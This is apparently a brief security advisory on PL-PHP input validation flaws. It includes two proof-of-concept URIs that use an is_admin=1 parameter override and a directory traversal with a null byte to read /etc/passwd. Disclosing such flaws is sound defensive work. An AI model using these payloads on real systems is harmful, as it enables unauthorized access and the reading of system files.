PL-PHP Multiple Input Validation Vulnerabilities

PL-PHP Multiple Input Validation Vulnerabilities

An attacker can use a browser to exploit any of these issues.

The following proof-of-concept URIs are available:

http://www.example.com/files/admin.php?is_admin=1&lang=../../../../../../etc/passwd%00
http://www.example.com/files/admin.php?&lang=../../../../../../etc/passwd%00